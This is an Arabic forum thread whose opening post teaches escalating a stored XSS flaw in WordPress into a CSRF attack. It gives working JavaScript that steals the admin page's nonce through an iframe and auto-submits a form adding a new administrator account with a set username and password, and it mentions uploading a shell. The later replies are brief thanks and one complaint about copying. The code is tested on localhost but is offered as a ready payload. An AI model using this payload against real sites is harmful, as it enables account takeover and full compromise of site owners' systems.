• أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
  • بادئ الموضوع a7mdrat
  • تاريخ البدء
الحالة
مغلق و غير مفتوح للمزيد من الردود.
غير متصل

إنضم
7 أغسطس 2012
المشاركات
30
الإعجابات
1
النقاط
30
الإجابات المقدمة: 0
#1

الموضوع عن الاستغلال المتفدم لثغرات xss
و عدم الاكتفاء بالطريق التقليدية لسحب الكوكيز

نوع من انواع الاستغلال المتقدم هو التحويل من xss الى CSRF

و المقصود هنا تقدر تعمل اي شئ كانك داخل اللوحة

و للتجرية اخترت سكربت وردبريس

لان اغلب الناس لما تجد xss تقول ثغرة مالها لزمة


xss اخطر انواع الثغرات خصوصا stored

اذا ان الادمن نفسه ينفذ الكود في متصفحه
يعني تخطي مشاكل الجدار الناري ......

نترك الكلام و نأتي للتطبيق

موضوع اليوم عن add admin wordpress via xss

اولا ناتي الى طريقة كتابة الاستغلال

هناك عدة طريق نشرحها وحدة وحدة

الطريقة الاولى:
0-امور مساعدة
1- قرات التوكن عن طريق xss
2- انشاء فورم عن طريق javascript و التنفيذ


0-
ننصب السكربت على المحلي


الروابط تضهر للاعضاء فقط سجل دخولك أو قم بالتسجيل الآن.


ندخل اللوحة عادي
ثم ننشأ ملف html ونكتب الاستغلال داخله
اول شئ وهو عمل iframe يسحب صفحة اضافة الادمن وهي على المسار

الروابط تضهر للاعضاء فقط سجل دخولك أو قم بالتسجيل الآن.

PHP:
<script>
  document.writeln('<iframe id="iframe" onload="loadz()" src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>');  
</script>

ثم حفظ الملف باسم massacreur.html
بدخل الملف

الروابط تضهر للاعضاء فقط سجل دخولك أو قم بالتسجيل الآن.


1- قرات التوكن عن طريق xss

الان نبحث على input التوكن
PHP:
<input type="hidden" id="_wpnonce_create-user" name="_wpnonce_create-user" value="79b9646aef" />

كود جافا سكربت بسيط لسحب التوكين

PHP:
<script>
document.writeln('<iframe id="iframe" onload="loadz()" src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>');  
 function loadz() {
  eval ("var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 
alert( wptoken); 
}
 </script>
الان معنا التوكن

2- انشاء فورم عن طريق javascript و التنفيذ

نقوم نتكوين form اضافة ادمين + ارسال

نسحب form صفحة اضافة ادمن ثم ننزع الاشياء الغير مهمة المتعلقة بال css و structure de la page html

نترك الاساسي فقط

يصبح هكذا

massacreur.html
PHP:
<script>
  document.writeln('<iframe id="iframe" onload="loadz()" src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>');  
  function loadz() {
  eval ("var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 
  document.writeln('<iframe><form id="bd" action="http://127.0.0.1/wordpress/wp-admin/user-new.php" method="post" name="bd" id="createuser" class="validate">');
  document.writeln('<input name="action" type="text" value="createuser" />');
  document.writeln('<input type="text" id="_wpnonce_create-user" name="_wpnonce_create-user" value="'+wptoken+'" />'); 
  document.writeln('<input type="text" name="_wp_http_referer" value="http://127.0.0.1/wordpress/wp-admin/user-new.php" />'); 
  document.writeln('<input name="user_login" type="text" id="user_login" value="massacreur" aria-required="true" />');
  document.writeln('<input name="email" type="text" id="email" value="webservers@hotmail.fr" />');
  document.writeln('<input name="last_name" type="text" id="last_name" value="massacreur" /></td>'); 
  document.writeln('<input name="url" type="text" id="url" class="code" value="massacreur" />');
  document.writeln('<input class="text" value=" " />');
  document.writeln('<input name="pass1" type="text" id="pass1" autocomplete="off" value="toxico" />');
  document.writeln('<input name="pass2" type="text" id="pass2" autocomplete="off" value="toxico" />');
  document.writeln('<input type="text" value="send_password" name="send_password" id="send_password"  />'); 
  document.writeln('<input type="text"  name="role" id="role"  />'); 
  document.writeln('<input name="role" id="role" value="administrator">'); 
  document.writeln('<input id="submit" class="button button-primary" type="submit" value="Add New User " name="submit">');
  document.writeln('</form>'); 
  document.forms[0].submit.click(); 
  
  }  
</script>
وفي الاخير

نحذف

<script></script>

ونغير الامتداد الى

.js

هذه احد الطرق

هناك طرق اكثر فعالية
سوف اشرحها في يوم من الايام ان شاء الله


يمكنك اضافة ادمين او رفع شل من كانك داخل اللوحة
اسئلة و اضافات و نقاشات جادة لوسمحتم
الطريقة ليست بالجديد لكن لم اجد لها شروحات منقول للامانه bye1~`

 


غير متصل

إنضم
19 يوليو 2012
المشاركات
68
الإعجابات
0
النقاط
30
الإقامة
ksa
الإجابات المقدمة: 1
#2
رد: Advanced XSS Part 1

جزاكم الله خيراً ,أخي العزيز

موضوع رائع
 


غير متصل

DeveloPer Plus
إنضم
9 أبريل 2012
المشاركات
136
الإعجابات
5
النقاط
50
العمر
26
الإقامة
United States
الإجابات المقدمة: 0
#3
رد: Advanced XSS Part 1

بارك الله فيك أخى الغالى
 


غير متصل

إنضم
22 مايو 2012
المشاركات
14
الإعجابات
0
النقاط
5
الإقامة
Algeria
الإجابات المقدمة: 0
#4
رد: Advanced XSS Part 1

الله يبارك بيك اخي الغالي
 


غير متصل

T H E P U N I S H E R

.:: أداري أقسام التصميم والجرافيكس ::.

إنضم
29 مارس 2012
المشاركات
316
الإعجابات
1,274
النقاط
516
الإقامة
Egypt (●̪•)
الإجابات المقدمة: 0
#5
رد: Advanced XSS Part 1

بآرك الله فيك آخي الغالي​
 


غير متصل

Developer
إنضم
24 أبريل 2013
المشاركات
3
الإعجابات
0
النقاط
5
الإجابات المقدمة: 0
#6
رد: Advanced XSS Part 1

قبل لا تنقل الموضوع حرفيا المرة الجاية قم بالاستاذان اولا
يخي عباد يخي
 


الحالة
مغلق و غير مفتوح للمزيد من الردود.
الوسوم - Tag الوسوم - Tag
الوسوم advanced part
Advanced XSS Part 1